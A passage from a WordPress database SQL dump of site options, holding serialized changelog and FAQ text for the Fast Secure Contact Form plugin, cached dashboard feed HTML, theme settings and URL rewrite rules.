welcome.</li>\n</ul>\n\n<h4>1.3</h4>\n\n<ul>\n<li>(04 Sep 2009) Added Feature: This contact form sends E-mail with UTF-8 character encoding for US and International character support.(fee FAQ)</li>\n<li>Added Danish Language (da_DK) - Translated by <a href=\"http://www.ohyeah-webdesign.dk\">Thomas J. Langer</a></li>\n<li>fixed an issue with the \"Welcome introduction\" field translation not translating.</li>\n</ul>\n\n<h4>1.2.5</h4>\n\n<ul>\n<li>(02 Sep 2009) Added Norwegian language (nb_NO) - Translated by <a href=\"http://roger.inro.net/\">Roger Sylte</a></li>\n</ul>\n\n<h4>1.2.4</h4>\n\n<ul>\n<li>(02 Sep 2009) Added German Language (de_DE) - Translated by <a href=\"http://sebastian.kreideweiss.info/\">Sebastian Kreideweiss</a></li>\n</ul>\n\n<h4>1.2.3</h4>\n\n<ul>\n<li>(01 Sep 2009) Fixed email validation on some windows servers</li>\n<li>Added Traditional Chinese, Taiwan Language (zh_TW) - Translated by [Cjh]</li>\n<li>Added French language (fr_FR) - Translated by <a href=\"http://pierre.sudarovich.free.fr/\">Pierre Sudarovich</a></li>\n</ul>\n\n<h4>1.2.2</h4>\n\n<ul>\n<li>(31 Aug 2009) Added Italian language (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n</ul>\n\n<h4>1.2.1</h4>\n\n<ul>\n<li>(31 Aug 2009) Added more diagnostic test scripts: a Cookie Test, Captcha test, and a PHP Requirements Test.\nClick on the \"Test if your PHP installation will support the CAPTCHA\" link on the Options page.\nor open this URL in your web browser to run the test:</li>\n</ul>\n\n<pre><code>/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php</code></pre>\n\n<h4>1.2</h4>\n\n<ul>\n<li>(31 Aug 2009) Translations were not working</li>\n</ul>\n\n<h4>1.1.7</h4>\n\n<ul>\n<li>(31 Aug 2009) Cookie error improvements.</li>\n</ul>\n\n<h4>1.1.6</h4>\n\n<ul>\n<li>(30 Aug 2009) Added a Cookie Test to help diagnose if a web browser has cookies disabled.\nClick on the \"Test if your PHP installation will support the CAPTCHA\" link on the Options page.\nor open this URL in your web browser to run the test:</li>\n</ul>\n\n<pre><code>/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php</code></pre>\n\n<h4>1.1.5</h4>\n\n<ul>\n<li>(30 Aug 2009) Improved Akismet function (checks for <code>wordpress_api_key</code>)</li>\n<li>Hide CAPTCHA for registered users is now disabled by default(configurable in Options)</li>\n</ul>\n\n<h4>1.1.4</h4>\n\n<ul>\n<li>(29 Aug 2009) Improved <code>ctf_validate_email</code> function and fixed a bug that invalidated email address with upper case</li>\n</ul>\n\n<h4>1.1.3</h4>\n\n<ul>\n<li>(29 Aug 2009) Added this script to be used to test if your PHP installation will support the CAPTCHA:\nOpen this URL in your web browser to run the test:</li>\n</ul>\n\n<pre><code>/wp-content/plugins/si-contact-form/captcha-secureimage/secureimage_test.php</code></pre>\n\n<h4>1.1.2</h4>\n\n<ul>\n<li>(28 Aug 2009) Updated Turkish language (tr_TR) - Translated by <a href=\"http://www.tapcalap.com/\">Tolga</a></li>\n</ul>\n\n<h4>1.1.1</h4>\n\n<ul>\n<li>(28 Aug 2009) Added Turkish language (tr_TR) - Translated by <a href=\"http://www.tapcalap.com/\">Tolga</a></li>\n<li>CAPTCHA fix - Added Automatic fail over from TTF Fonts to GD Fonts if the PHP installation is configured without \"--with-ttf\".\nSome users were reporting there was no error indicating this TTF Fonts not supported condition and the captcha was not working.</li>\n</ul>\n\n<h4>1.1</h4>\n\n<ul>\n<li>(28 Aug 2009) Added multi \"email to\" contact feature. Add as many contacts as you need in Options. The drop down list on the contact form will be made automatically.</li>\n</ul>\n\n<h4>1.0.3</h4>\n\n<ul>\n<li>(28 Aug 2009) fix options permission bug introduced by last update, sorry</li>\n</ul>\n\n<h4>1.0.2</h4>\n\n<ul>\n<li>(27 Aug 2009) Added Akismet spam protection. Checks the form input with Akismet, but only if Akismet plugin is also installed.</li>\n<li>added settings link to the plugin action links.</li>\n</ul>\n\n<h4>1.0.1</h4>\n\n<ul>\n<li>(26 Aug 2009) fixed deprecated ereg_replace and eregi functions for PHP 5.3+ compatibility when error warnings are on</li>\n</ul>\n\n<h4>1.0</h4>\n\n<ul>\n<li>(26 Aug 2009) Initial Release</li>\n</ul>\";s:3:\"faq\";s:6098:\"<p><a href=\"http://www.fastsecurecontactform.com/faq-wordpress-version\">See the official FAQ at FastSecureContactForm.com</a></p>\n\n<h4>I just installed this and do not get any email from it, what could be wrong?</h4>\n\n<p><a href=\"http://www.fastsecurecontactform.com/email-does-not-send\">See FAQ page: How to troubleshoot email delivery</a></p>\n\n<h4>Is this plugin available in other languages?</h4>\n\n<p>Yes. To use a translated version, you need to obtain or make the language file for it.\nAt this point it would be useful to read <a href=\"http://codex.wordpress.org/Installing_WordPress_in_Your_Language\" title=\"Installing WordPress in Your Language\">Installing WordPress in Your Language</a> from the Codex. You will need an .mo file for this plugin that corresponds with the \"WPLANG\" setting in your wp-config.php file. Translations are listed below -- if a translation for your language is available, all you need to do is place it in the <code>/wp-content/plugins/si-contact-form/languages</code> directory of your WordPress installation. If one is not available, and you also speak good English, please consider doing a translation yourself (see the next question).</p>\n\n<p>The following translations are included in the download zip file:</p>\n\n<ul>\n<li>Albanian (sq_AL) - Translated by <a href=\"http://www.romeolab.com\">Romeo Shuka</a></li>\n<li>Arabic (ar) partial translation - Translated by Jasmine Hassan</li>\n<li>Bulgarian (bg_BG) - Translated by <a href=\"http://chereshka.net\">Dimitar Atanasov</a></li>\n<li>Chinese (zh_CN) - Translated by <a href=\"http://www.awuit.cn/\">Awu</a> </li>\n<li>Danish (da_DK) - Translated by <a href=\"http://wordpress.blogos.dk/wpdadkdownloads/\">GeorgWP</a></li>\n<li>Farsi(Persian)(fa_IR) partial translation - Translated by Ramin Firooz</li>\n<li>Finnish (fi) - Translated by <a href=\"http://www.guimikko.com/\">Mikko Vahatalo</a> </li>\n<li>French (fr_FR) - Translated by <a href=\"http://pierre.sudarovich.free.fr/\">Pierre Sudarovich</a></li>\n<li>German (de_DE) - Translated by <a href=\"http://sebastian.kreideweiss.info/\">Sebastian Kreideweiss</a></li>\n<li>Greek (el) - Translated by <a href=\"http://www.jbaron.gr/\">Ioannis</a></li>\n<li>Hebrew, Israel (he_IL) - Translated by Asaf Chertkoff FreeAllWeb GUILD</li>\n<li>Hungarian (hu_HU) - Translated by <a href=\"http://dmgmedia.hu\">Jozsef Burgyan</a></li>\n<li>Italian (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n<li>Japanese (ja) - Translated by [Ichiro Kozuka]</li>\n<li>Norwegian Bokmal (nb_NO) - Translated by <a href=\"http://punktlig-ikt.no\">Tore Johnny Bratveit</a></li>\n<li>Polish (pl_PL) - Translated by [Pawel Mezyk]</li>\n<li>Portuguese (pt_PT) - Translated by <a href=\"http://pws.op351.net/\">AJBFerreira Blog</a></li>\n<li>Portuguese Brazil (pt_BR) - Translated by [Rui Alao]</li>\n<li>Romanian (ro_RO) - Translated by <a href=\"http://www.jibo.ro\">Anunturi Jibo</a></li>\n<li>Russian (ru_RU) - Translated by <a href=\"http://www.iflexion.com/\">Iflexion</a></li>\n<li>Spanish (es_ES) - Translated by <a href=\"http://www.activosenred.com/\">Valentin Yonte Rodriguez</a></li>\n<li>Swedish (sv_SE) - Translated by <a href=\"http://walktheline.boplatsen.se/\">Daniel Persson</a></li>\n<li>Traditional Chinese, Taiwan (zh_TW) - Translated by [Cjh]</li>\n<li>Turkish (tr_TR) - Translated by <a href=\"http://www.tapcalap.com/\">Tolga</a></li>\n<li>Ukrainian (uk_UA) - Translated by <a href=\"http://wordpress.ua/\">Wordpress.Ua</a></li>\n<li>More are needed... Please help translate.</li>\n</ul>\n\n<h4>Can I provide a translation?</h4>\n\n<p>Yes! \nHow to translate Fast Secure Contact Form for WordPress\n<a href=\"http://www.fastsecurecontactform.com/how-to-translate\" rel=\"nofollow\">http://www.fastsecurecontactform.com/how-to-translate</a></p>\n\n<h4>Is it possible to update the translation files for newest version?</h4>\n\n<p>How to update a translation of Fast Secure Contact Form for WordPress\n<a href=\"http://www.fastsecurecontactform.com/how-to-update-translation\" rel=\"nofollow\">http://www.fastsecurecontactform.com/how-to-update-translation</a></p>\n\n<h4>This contact form sends E-mail with UTF-8 character encoding for US and International character support.</h4>\n\n<p>English-language users will experience little to no impact. Any non-English questions or messages submitted will have unicode character encoding so that when you receive the e-mail, the language will still be viewable.</p>\n\n<p>If you receive an email with international characters and the characters look garbled with symbols and strange characters, your e-mail program may need to be set as follows:</p>\n\n<p>How to set incoming messages character encoding to Unicode(UTF-8) in various mail clients:</p>\n\n<p>Evolution:\nView > Character Encoding > Unicode</p>\n\n<p>Outlook Express 6, Windows Mail:\nPlease check \"Tools->Options->Read->International Settings\". Un-check \"Use default encoding format for all incoming messages\" \nNow select \"View->Encoding\", select \"Unicode(UTF-8)\"</p>\n\n<p>Mozilla Thunderbird:\nClick on Inbox.\nSelect \"View->Character Encoding\", select \"Unicode(UTF-8)\"</p>\n\n<p>Gmail:\nNo setting necessary, it just works.</p>\n\n<p>For more help... <a href=\"http://www.fastsecurecontactform.com/faq-wordpress-version\">See the official FAQ at FastSecureContactForm.com</a></p>\n\n<h4>What is the \"Set a meeting\" option I have in my form?</h4>\n\n<p>You can extend your contact form to let your users to Schedule Meetings based on your availability, meet online with web-based video, talk over phone conference, and collect payments for your time and services.</p>\n\n<p>You can enable this option in \"Accept Meeting Requests\" section at contact form settings page.\nYou can then configure your meeting preferences, set your availability and more by activating your free vCita account (again at the contact form settings).</p>\n\n<p>You can learn more about vCita at <a href=\"http://www.vcita.com?invite=FSContact\">http://www.vcita.com</a>\nIf you have any question about the Schedule Meetings feature please contact <a href=\"mailto:support@vcita.com\">support@vcita.com</a></p>\";}s:13:\"download_link\";s:57:\"http://downloads.wordpress.org/plugin/si-contact-form.zip\";s:4:\"tags\";a:10:{s:7:\"akismet\";s:7:\"Akismet\";s:7:\"captcha\";s:7:\"captcha\";s:7:\"contact\";s:7:\"contact\";s:12:\"contact-form\";s:12:\"contact form\";s:5:\"email\";s:5:\"email\";s:4:\"form\";s:4:\"form\";s:4:\"mail\";s:4:\"mail\";s:12:\"multilingual\";s:12:\"multilingual\";s:4:\"spam\";s:4:\"spam\";s:4:\"wpmu\";s:4:\"wpmu\";}}','no'),(738,'_site_transient_timeout_wporg_theme_feature_list','1423178707','yes'),(739,'_site_transient_wporg_theme_feature_list','a:5:{s:6:\"Colors\";a:15:{i:0;s:5:\"black\";i:1;s:4:\"blue\";i:2;s:5:\"brown\";i:3;s:4:\"gray\";i:4;s:5:\"green\";i:5;s:6:\"orange\";i:6;s:4:\"pink\";i:7;s:6:\"purple\";i:8;s:3:\"red\";i:9;s:6:\"silver\";i:10;s:3:\"tan\";i:11;s:5:\"white\";i:12;s:6:\"yellow\";i:13;s:4:\"dark\";i:14;s:5:\"light\";}s:7:\"Columns\";a:6:{i:0;s:10:\"one-column\";i:1;s:11:\"two-columns\";i:2;s:13:\"three-columns\";i:3;s:12:\"four-columns\";i:4;s:12:\"left-sidebar\";i:5;s:13:\"right-sidebar\";}s:8:\"Features\";a:19:{i:1;s:8:\"blavatar\";i:2;s:10:\"buddypress\";i:3;s:17:\"custom-background\";i:4;s:13:\"custom-colors\";i:5;s:13:\"custom-header\";i:6;s:11:\"custom-menu\";i:7;s:12:\"editor-style\";i:8;s:21:\"featured-image-header\";i:9;s:15:\"featured-images\";i:10;s:15:\"flexible-header\";i:11;s:20:\"front-page-post-form\";i:12;s:19:\"full-width-template\";i:13;s:12:\"microformats\";i:14;s:12:\"post-formats\";i:15;s:20:\"rtl-language-support\";i:16;s:11:\"sticky-post\";i:17;s:13:\"theme-options\";i:18;s:17:\"threaded-comments\";i:19;s:17:\"translation-ready\";}s:7:\"Subject\";a:3:{i:0;s:7:\"holiday\";i:1;s:13:\"photoblogging\";i:2;s:8:\"seasonal\";}s:5:\"Width\";a:2:{i:0;s:11:\"fixed-width\";i:1;s:14:\"flexible-width\";}}','yes'),(198,'theme_mods_twentytwelve','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1369669325;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(745,'_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1423563973','no'),(746,'_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1423520773','no'),(747,'_transient_timeout_dash_4077549d03da2e451c8b5f002294ff51','1423563973','no'),(748,'_transient_dash_4077549d03da2e451c8b5f002294ff51','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2014/12/dinah/\' title=\'Version 4.1 of WordPress, named “Dinah” in honor of jazz singer Dinah Washington, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style. Introducing Twenty Fifteen Our newest default theme, Twenty Fifteen, is […] […]\'>WordPress 4.1 “Dinah”</a> <span class=\"rss-date\">December 18, 2014</span><div class=\'rssSummary\'>Version 4.1 of WordPress, named “Dinah” in honor of jazz singer Dinah Washington, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style. Introducing Twenty Fifteen Our newest default theme, Twenty Fifteen, is […] […]</div></li><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/\' title=\'The next release candidate for WordPress 4.1 is now available for testing. Seventy changes have gone in since the first release candidate. With no known issues left, we plan to release 4.1 tomorrow, December 18. To test, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If you’ […]\'>WordPress 4.1 Release Candidate 3</a> <span class=\"rss-date\">December 18, 2014</span><div class=\'rssSummary\'>The next release candidate for WordPress 4.1 is now available for testing. Seventy changes have gone in since the first release candidate. With no known issues left, we plan to release 4.1 tomorrow, December 18. To test, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If you’ […]</div></li></ul></div>','no'),(765,'_transient_timeout_plugin_slugs','1423607176','no'),(766,'_transient_plugin_slugs','a:13:{i:0;s:19:\"akismet/akismet.php\";i:1;s:41:\"all-in-one-favicon/all-in-one-favicon.php\";i:2;s:26:\"backupwordpress/plugin.php\";i:3;s:35:\"display-widgets/display-widgets.php\";i:4;s:15:\"eshop/eshop.php\";i:5;s:35:\"si-contact-form/si-contact-form.php\";i:6;s:50:\"google-analytics-for-wordpress/googleanalytics.php\";i:7;s:36:\"google-sitemap-generator/sitemap.php\";i:8;s:19:\"jetpack/jetpack.php\";i:9;s:21:\"podpress/podpress.php\";i:10;s:21:\"sociable/sociable.php\";i:11;s:17:\"wassup/wassup.php\";i:12;s:27:\"wp-super-cache/wp-cache.php\";}','no'),(153,'can_compress_scripts','1','yes'),(700,'rewrite_rules','a:73:{s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:29:\"comments/page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)(/[0-9]+)?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:31:\".+?/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\".+?/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\".+?/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\".+?/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\".+?/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:26:\"(.+?)/([^/]+)/trackback/?$\";s:57:\"index.php?category_name=$matches[1]&name=$matches[2]&tb=1\";s:46:\"(.+?)/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:69:\"index.php?category_name=$matches[1]&name=$matches[2]&feed=$matches[3]\";s:41:\"(.+?)/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:69:\"index.php?category_name=$matches[1]&name=$matches[2]&feed=$matches[3]\";s:34:\"(.+?)/([^/]+)/page/?([0-9]{1,})/?$\";s:70:\"index.php?category_name=$matches[1]&name=$matches[2]&paged=$matches[3]\";s:41:\"(.+?)/([^/]+)/comment-page-([0-9]{1,})/?$\";s:70:\"index.php?category_name=$matches[1]&name=$matches[2]&cpage=$matches[3]\";s:26:\"(.+?)/([^/]+)(/[0-9]+)?/?$\";s:69:\"index.php?category_name=$matches[1]&name=$matches[2]&page=$matches[3]\";s:20:\".+?/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:30:\".+?/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:50:\".+?/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:45:\".+?/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:45:\".+?/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:33:\"(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:26:\"(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:33:\"(.+?)/comment-page-([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&cpage=$matches[2]\";s:8:\"(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";}','yes'),(195,'ahimsa','a:16:{s:4:\"init\";i:1;s:12:\"showloginout\";i:1;s:11:\"showauthors\";i:1;s:14:\"defhidesidebar\";i:0;s:14:\"defhidesbpages\";i:1;s:10:\"sectprefix\";i:1;s:12:\"idxfadepmeta\";i:0;s:12:\"showpagemeta\";i:1;s:15:\"showpageactions\";i:1;s:9:\"iecorners\";i:0;s:9:\"showdelic\";i:0;s:7:\"delicid\";s:0:\"\";s:10:\"delictitle\";s:21:\"Recent News and Links\";s:9:\"copyright\";s:0:\"\";s:4:\"skin\";s:4:\"none\";s:7:\"logourl\";s:0:\"\";}','yes'),(361,'_site_transient_timeout_fscf_kws_ad','1370647352','yes'),(362,'_site_transient_fscf_kws_ad','<style>\n #kws_message {\n width:820px;\n font-size: 1.1em; \n }\n #kws_message h3 {\n display: block;\n margin: 1em 0 0 0;\n clear: both;\n }\n #kws_message .cc_logo {\n padding-top: .75em;\n }\n</style>\n\n<div id=\"kws_message\" class=\"updated\">\n <a href=\"http://katz.si/fscfdesign1\" class=\"alignleft cc_logo\"><img alt=\"Constant Contact\" src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARkAAAApCAMAAAA2w608AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAwBQTFRFtsbaGEV8JlOM+89tUXanma7KJk98mq3FiKLDqLnOi6G5GUaA7Lhp+slcUXSgRGaN/ee2/NqOUnOZboyxhqDC/eCh/NR8fZax+9F12+LsGENyUnSd+Mtxt8TWJlOR8LhYQ2qe66AhNF6VQ2eR+spg7Lx3i6LAiqLEHURyg57AvcvdYICpNVyNi6PC8qod9a4b8agd/vTe7KMf5psjb4qpJlGFk6rI+LEa/u7M/eKp/eq+NF+Y/NyV+8xn97Aa/d+dboy0tsXYxdDc6Z4hqLjK5Jkk99us7bVZ/vDTbouuNF2R+cVT1Nzm1d7qUXWk+9Bx1Nzkt8TUYH+ljqG5t8TSYH6eK1B8+sZVNVuFYIGvdZK4YH6g/evD+ujHqLrRpbnRYIGsma7I4ZUlmqzC/evGcIyui6K++LUocYupJlCAnrPN/eStHEV1+Nec6qxN+taN+9aDssPY9sBVfZe5Q2iWGUeE/vLZ/e3JKFKF/ei6/N2bNVuJxtDdx9Db9M+QnK3BjqG3Q2mZF0iIF0eHF0eGF0eFGEN1F0aDF0aBGER5F0V/GEN2GER6F0eEGER4qLrT093pF0V+i6PExdHibo22xdHhF0eIF0aCF0aAUnGVGER3GEV7fZi9ma/MxdHg76YeQ2qggJu/9KwcG0V4GkZ+iqTEUnKWF0Z/09zoqLrSG0V6fZi8fZm9xdDexdHf55wii6K9G0Z709znfZi7GkZ8eZW7/d2Y/NeFe5i8+shZ+sdY7aMf8KcefZe3xdDf+9iMi6G8+bw2qLnQtsXaws/ggZatxNHh/u/Q/NWAqLvT6bBc+stj/NR+8MqS+OXIxtLitMTZw9Dh9+C6VnOU1Nvk8a0rwc7fsMHWb4mnUXWmGEiH+9ub9+TJ/O7Vr8HW/vXgj6fG/N6b4OfvuMTSjKPAxtHe+cBEOVuDOFyJcIyw78B2/ezF9tGPfZWv7agu8c+gVnKT5aJA5qdP561cmq/L+uvW+uzW/NiKUnWj/OOs67Jb+MJUF0iJF0iK///gFBQU3oCw6gAAAQB0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AFP3ByUAAAqDSURBVHja7JoJdJTVFcc/w4QYtAFZGiRkGpOQImSKVALKQCUQRGAMBQwQERo2CwguLIqioiQggjLTWdrGZmKkhCakoRRbCrUsiooL3fe92t2W7gu25B/fvfd73zKZnIRU23PSvHMc37zv3ve/7/fuu28yg9Ha06wGaovWPvjGv175K4weHjaUHw5dd9WTz1wx5eqpS4f1kDGxBLb86YVrR+15nyaD1h4yCkv2ynlrhs/Dh20yw3rItKJ4xab9n1wzfPhDJz5gk0Hr/z0Z/OKSvZ8jMiplbDJv9JBpxUaTzNwT42wy/2hLBv+L4N6526Zjo3OaDJ61yUwjR8N9b4U6Nd/be1dG3hFNBD2e8o6mRWybSWblteM0mfdM+4aTDBD3eFuo1dXgv8YlWO4XzejbrYlIeZ2nxtPBtMjVZO4/c+K+5ctpjy5/XfbJMGOMttjtQtF0esddhkDYa2t60KkM67QMwmiJlicHbk2Dxh8oMoUr0u5XQGJG4+qBVz716c/f/CGbDIKOGFtaDFzYgYh3asdBKQLHpvqdmmF07B8Kh9EpGRUPwqEWTzBZYMCZe8xh+HMnLQb6TRjcz6ivr7/4YiEjT4mMK2FaWvwXBKZGLbCuMxser1Nzwy4DLs2WjsFEvZ3iFzRlUBcN1bUtNMCb889YORPCLffNyn/XF+djrE1moEVGg/EEVS2MBMv